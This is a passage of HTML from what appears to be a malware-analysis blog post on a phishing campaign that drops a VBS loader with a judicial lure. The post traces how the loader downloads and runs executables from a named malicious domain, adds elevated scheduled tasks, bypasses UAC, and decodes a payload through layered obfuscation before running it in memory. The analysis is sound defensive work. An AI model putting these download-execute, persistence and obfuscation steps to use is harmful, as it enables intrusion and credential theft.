width=\"741\" height=\"815\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_2.png\" alt=\"\" class=\"wp-image-20376\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_2.png 741w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_2-273x300.png 273w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_2-370x407.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_2-270x297.png 270w\" sizes=\"(max-width: 741px) 100vw, 741px\" \/><figcaption class=\"wp-element-caption\"><em>Malware process tree in the sandbox analysis<\/em><\/figcaption><\/figure>\n\n\n\n<p>The processes include malware delivery, payload delivery, persistence establishment, and more:<\/p>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-293\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"2\"\n           data-rows=\"12\"\n           data-wpID=\"293\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-bc-03A9F4 wpdt-bold wpdt-fs-000014\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:13.623978201635%;                    padding:10px;\n                    \"\n                    >\n                                        Phase\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bc-03A9F4 wpdt-bold wpdt-fs-000014\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:86.376021798365%;                    padding:10px;\n                    \"\n                    >\n                                        Description\u00a0                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-bold wpdt-bc-FFFFFF\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Delivery\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000013 wpdt-align-left\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Phishing email with judicial lure. Password-protected PDF attachment. Victim instructed to download VBS via embedded link.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-bold\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Initial Execution\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000013 wpdt-align-left\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Victim manually executes 0124_INTMACAO_.vbs from Downloads folder. WScript.exe invoked.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-bold\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Gate Contact\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000013 wpdt-align-left\"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        VBS contacts\u00a0odaracani.online\/index.php?id=3df947b3 (unique victim ID). GET returns 200; POST triggers 302 redirect.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-bold\"\n                                            data-cell-id=\"A5\"\n                    data-col-index=\"0\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Payload Landing\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000013 wpdt-align-left\"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Redirected to\u00a0nuevaprodeciencia.club\/br77b\/ redirect chain via\u00a0cert.php\u00a0\u2192\u00a0cord.php\u00a0\u2192\u00a0download.php\u00a0\u2192\u00a0arquivos\/download.php?id_*.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-bold\"\n                                            data-cell-id=\"A6\"\n                    data-col-index=\"0\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Payload Download\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000013 wpdt-align-left\"\n                                            data-cell-id=\"B6\"\n                    data-col-index=\"1\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        VBS uses MSXML2.ServerXMLHTTP.6.0 +\u00a0ADODB.Stream\u00a0to download reiniciar.exe (~6.4 MB) and wifi_driver.exe (~12.6 MB, served as msedge04.exe).\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-bold\"\n                                            data-cell-id=\"A7\"\n                    data-col-index=\"0\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Installation\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000013 wpdt-align-left\"\n                                            data-cell-id=\"B7\"\n                    data-col-index=\"1\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Payloads written to C:\\Program Files (x86)\\Wi-fi\\\u00a0masquerading as Wi-Fi driver components.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-bold\"\n                                            data-cell-id=\"A8\"\n                    data-col-index=\"0\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Persistence\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000013 wpdt-align-left\"\n                                            data-cell-id=\"B8\"\n                    data-col-index=\"1\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Two Scheduled Tasks created via cmd.exe:\u00a0RunAsAdmin_AutoUpdate\u00a0and\u00a0RunAsAdmin_Executar\u00a0both \/sc\u00a0onlogon\u00a0\/rl\u00a0highest.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-bold\"\n                                            data-cell-id=\"A9\"\n                    data-col-index=\"0\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        UAC Bypass\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000013 wpdt-align-left\"\n                                            data-cell-id=\"B9\"\n                    data-col-index=\"1\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        VBS re-executes with arguments \/elevated \/fromtask\u00a0to gain elevated privileges without a UAC prompt.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-bold\"\n                                            data-cell-id=\"A10\"\n                    data-col-index=\"0\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Initial Beacon\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000013 wpdt-align-left\"\n                                            data-cell-id=\"B10\"\n                    data-col-index=\"1\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        VBS calls IWshShell3.Run() on\u00a0nuevaprodeciencia.club\/br77b\/iayjaskyeiagds.php\u00a0first\u00a0checkin\u00a0triggered directly from loader.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-bold\"\n                                            data-cell-id=\"A11\"\n                    data-col-index=\"0\"\n                    data-row-index=\"10\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        C2 Resolution\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000013 wpdt-align-left\"\n                                            data-cell-id=\"B11\"\n                    data-col-index=\"1\"\n                    data-row-index=\"10\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        wifi_driver.exe (container) loads agenteV2_historico_detect.dll, which reads Pastebin\u00a0dead-drop\u00a0(pastebin.com\/raw\/0RmxqY57) to resolve real C2: 38.242.246.176:8443.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-bold\"\n                                            data-cell-id=\"A12\"\n                    data-col-index=\"0\"\n                    data-row-index=\"11\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        C2 Beaconing\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000013 wpdt-align-left\"\n                                            data-cell-id=\"B12\"\n                    data-col-index=\"1\"\n                    data-row-index=\"11\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        agenteV2 beacons to C2 every ~60 seconds over TLS\/8443. 524 bytes sent \/ ~1 KB received per cycle. Stealer\u00a0module\u00a0active.\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-293'>\ntable#wpdtSimpleTable-293{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-293 td, table.wpdtSimpleTable293 th { white-space: normal !important; }\n.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}\n.wpdt-fs-000014 { font-size: 14px !important;}\n.wpdt-fs-000012 { font-size: 12px !important;}\n.wpdt-bc-FFFFFF { background-color: #FFFFFF !important;}\n.wpdt-fs-000013 { font-size: 13px !important;}\n<\/style>\n\n\n\n\n<h3 class=\"wp-block-heading\">3. Stage 1 VBScript Loader (0124_INTMACAO_.vbs)&nbsp;<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\"><em>3.1. Runtime Behavior (API Trace)<\/em>&nbsp;<\/h4>\n\n\n\n<p>The following sequence was reconstructed from the ANY.RUN script API trace, showing the exact execution order of COM object calls:&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"763\" height=\"789\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_3.png\" alt=\"\" class=\"wp-image-20386\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_3.png 763w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_3-290x300.png 290w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_3-370x383.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_3-270x279.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_3-740x765.png 740w\" sizes=\"(max-width: 763px) 100vw, 763px\" \/><figcaption class=\"wp-element-caption\"><em>ANY.RUN VBScript API call trace<\/em><\/figcaption><\/figure>\n\n\n\n<p><strong>Phase 1 reiniciar.exe download and persistence (~13 seconds post-execution):<\/strong>&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>IServerXMLHTTPRequest2.Open('GET', 'https:\/\/nuevaprodeciencia.club\/br77b\/arquivos\/download\/reiniciar.exe', False) \n\nIServerXMLHTTPRequest2.Send()                      -&gt; HTTP 200 OK \n\nADODB.Stream.Type = 1 (binary) \n\nADODB.Stream.Write(ResponseBody)                   -&gt; VT_ARRAY \n\nADODB.Stream.SaveToFile('C:\\Program Files (x86)\\Wi-fi\\reiniciar.exe', 2) \n\nIWshShell3.Run('cmd.exe \/c schtasks \/create \/f \/tn \"RunAsAdmin_Executar\" ...reiniciar.exe... \/sc onlogon \/rl highest', 0, False)<\/code><\/pre>\n\n\n\n<p><strong>Phase 2 wifi_driver.exe download, persistence and initial beacon (~22\u201329 seconds):<\/strong>&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>IServerXMLHTTPRequest2.Open('GET', 'https:\/\/nuevaprodeciencia.club\/br77b\/arquivos\/download\/msedge04.exe', False) \n\nIServerXMLHTTPRequest2.Send()                      -&gt; HTTP 200 OK \n\nADODB.Stream.SaveToFile('C:\\Program Files (x86)\\Wi-fi\\wifi_driver.exe', 2) \n\nIWshShell3.Run('\"C:\\Program Files (x86)\\Wi-fi\\wifi_driver.exe\"', 1, False)  \/\/ executed twice \n\nWScript.Sleep(3000) \n\nIWshShell3.Run('cmd.exe \/c schtasks \/create \/f \/tn \"RunAsAdmin_AutoUpdate\" ...wifi_driver.exe... \/sc onlogon \/rl highest', 0, False) \n\nIWshShell3.Run('https:\/\/nuevaprodeciencia.club\/br77b\/iayjaskyeiagds.php', 1, False)  \/\/ initial C2 beacon <\/code><\/pre>\n\n\n\n<p><strong>Key observations:<\/strong>&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>wifi_driver.exe is executed twice before&nbsp;Sleep(3000) retry mechanism to ensure process&nbsp;startup;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The server-side filename is msedge04.exe; it is saved locally as wifi_driver.exe deliberate renaming at download&nbsp;time;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The&nbsp;initial&nbsp;C2 beacon is fired by the VBS&nbsp;loader itself&nbsp;via IWshShell3.Run, before&nbsp;the payload&#8217;s own beaconing loop begins.&nbsp;<\/li>\n<\/ul>\n\n\n\n<h4 class=\"wp-block-heading\"><em>3.2. Obfuscation &amp; Payload Decoding Mechanism&nbsp;<\/em><\/h4>\n\n\n\n<p>The VBS loader implements a multi-layer obfuscation pipeline that decodes and executes a secondary payload entirely in memory. Despite its&nbsp;apparent&nbsp;complexity, the mechanism is fully deterministic and reversible \u2014 all decoding logic, keys, and transformations are self-contained in the script, with no external dependencies or dynamic key generation.&nbsp;<\/p>\n\n\n\n<p>The two on-disk forms confirm runtime&nbsp;deobfuscation:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>C:\\Users\\admin\\Downloads\\0124_INTMACAO_.vbs          (16,739 bytes  \u2014 obfuscated, as delivered) \n\nC:\\Users\\admin\\AppData\\Local\\Temp\\0124_INTMACAO_.vbs (140,302 bytes \u2014 fully decoded runtime copy) <\/code><\/pre>\n\n\n\n<p>The ~8.4x expansion factor is explained by the encoding pipeline described below.&nbsp;<\/p>\n\n\n\n<p>The encoded payload is stored as a large string built via repeated concatenation:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>tEXXKcvxSM = tEXXKcvxSM &amp; \"&lt;chunk&gt;\" <\/code><\/pre>\n\n\n\n<p>This pattern avoids signature-based detection of long static strings, prevents straightforward extraction, and obscures the actual payload size. It is a common technique in commodity VBS loaders.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"533\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_4-1024x533.png\" alt=\"\" class=\"wp-image-20405\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_4-1024x533.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_4-300x156.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_4-768x400.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_4-370x193.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_4-270x140.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_4-740x385.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_4.png 1326w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Encoded VBScript Snippet<\/em><\/figcaption><\/figure>\n\n\n\n<p>Three transformation functions are applied in sequence before the payload is executed:&nbsp;<\/p>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-294\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"3\"\n           data-rows=\"4\"\n           data-wpID=\"294\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-bold wpdt-fs-000014 wpdt-bc-03A9F4\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:14.833501513623%;                    padding:10px;\n                    \"\n                    >\n                                        Function\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-fs-000014 wpdt-bc-03A9F4\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:56.004036326942%;                    padding:10px;\n                    \"\n                    >\n                                        Technique\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-fs-000014 wpdt-bc-03A9F4\"\n                                            data-cell-id=\"C1\"\n                    data-col-index=\"2\"\n                    data-row-index=\"0\"\n                    style=\" width:29.162462159435%;                    padding:10px;\n                    \"\n                    >\n                                        Security Value\u00a0                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        AqBVqmjYfY\u00a0(x3)\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Triple Base64 decode via MSXML2.DOMDocument (bin.base64)\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C2\"\n                    data-col-index=\"2\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Low \u2014 trivially reversible\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        YnrbBGjUXH\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Hexadecimal\u00a0decode \u2014\u00a0Chr(CInt(\"&H\" &\u00a0Mid(h,\u00a0i, 2)))\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C3\"\n                    data-col-index=\"2\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Low \u2014 simple hex-to-bytes\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        obmFYHGTeJ\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Custom\u00a0byte\u00a0transform \u2014\u00a0Vigenere-like modular subtraction with hardcoded key array\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C4\"\n                    data-col-index=\"2\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Low-Medium \u2014 broken by embedded keys\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-294'>\ntable#wpdtSimpleTable-294{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-294 td, table.wpdtSimpleTable294 th { white-space: normal !important; }\n.wpdt-fs-000014 { font-size: 14px !important;}\n.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}\n.wpdt-fs-000012 { font-size: 12px !important;}\n<\/style>\n\n\n\n\n<p><strong>Step 1 \u2014 Triple Base64 Decoding.<\/strong>&nbsp;The function&nbsp;AqBVqmjYfY&nbsp;wraps the MSXML2.DOMDocument COM object to perform Base64 decoding. It is called three consecutive times, nesting the calls:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>b = AqBVqmjYfY(AqBVqmjYfY(AqBVqmjYfY(b)))<\/code><\/pre>\n\n\n\n<p>Triple-encoding increases entropy and defeats naive single-pass&nbsp;decoders, but&nbsp;provides no cryptographic security \u2014 each layer is independently and trivially reversible.&nbsp;<\/p>\n\n\n\n<p><strong>Step 2 \u2014 Hexadecimal Decoding.&nbsp;<\/strong>The function&nbsp;YnrbBGjUXH&nbsp;converts the Base64-decoded output from a hex-encoded byte stream into raw bytes:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Chr(CInt(\"&amp;H\" &amp; Mid(h, i, 2))) <\/code><\/pre>\n\n\n\n<p>This&nbsp;confirms&nbsp;the intermediate payload is stored as a hex string, adding one further layer of visual obfuscation over the Base64 output.&nbsp;<\/p>\n\n\n\n<p><strong>Step 3 \u2014 Custom Byte Transformation (Pseudo-Encryption).&nbsp;<\/strong>The function&nbsp;obmFYHGTeJ&nbsp;is the core obfuscation layer. It applies a&nbsp;Vigenere-like modular subtraction cipher using a hardcoded array of multiple keys:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>keys = Array(\"xsTqWN3wxwsA\", \"Bydpez94dTlZ\", ...) <\/code><\/pre>\n\n\n\n<p>For each byte, the routine iterates through all keys in reverse order and applies:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ch = (ch - keyByte + 256) Mod 256 <\/code><\/pre>\n\n\n\n<p>This is similar to a repeated-key XOR\/Vigenere&nbsp;cipher. It is not cryptographically secure \u2014 the keys are hardcoded in the&nbsp;script,&nbsp;the transformation is deterministic, and the decoding pipeline is fully reproducible offline. The critical weakness is that all key material is embedded in the script itself.&nbsp;<\/p>\n\n\n\n<p>After the three-stage decoding, the final payload is executed directly in memory without&nbsp;writing any intermediate artifact to disk:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Execute obmFYHGTeJ(tEXXKcvxSM)<\/code><\/pre>\n\n\n\n<p>This fileless execution pattern means the next stage never touches the filesystem in decoded form, evading file-based AV scanning. The decoded payload can be recovered by inserting a logging hook at the Execute call or by running the decoding pipeline offline with the extracted keys.&nbsp;<\/p>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-295\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"3\"\n           data-rows=\"7\"\n           data-wpID=\"295\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-bold wpdt-fs-000014 wpdt-bc-03A9F4\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:16.28664495114%;                    padding:10px;\n                    \"\n                    >\n                                        Obfuscation Technique\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-fs-000014 wpdt-bc-03A9F4\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:16.28664495114%;                    padding:10px;\n                    \"\n                    >\n                                        Effectiveness\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-fs-000014 wpdt-bc-03A9F4\"\n                                            data-cell-id=\"C1\"\n                    data-col-index=\"2\"\n                    data-row-index=\"0\"\n                    style=\" width:67.42671009772%;                    padding:10px;\n                    \"\n                    >\n                                        Notes\u00a0                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Triple Base64\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Low\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"C2\"\n                    data-col-index=\"2\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Three independent reversible layers \u2014 no key material\u00a0required\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Hex encoding\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Low\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"C3\"\n                    data-col-index=\"2\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Simple Chr\/Mid conversion \u2014 standard textbook technique\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Custom\u00a0byte\u00a0transform\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Low-Medium\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"C4\"\n                    data-col-index=\"2\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Vigenere-like cipher with good structural complexity\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A5\"\n                    data-col-index=\"0\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Hardcoded key array\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Critical weakness\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"C5\"\n                    data-col-index=\"2\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        All keys embedded in script \u2014 full offline decryption possible\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A6\"\n                    data-col-index=\"0\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n              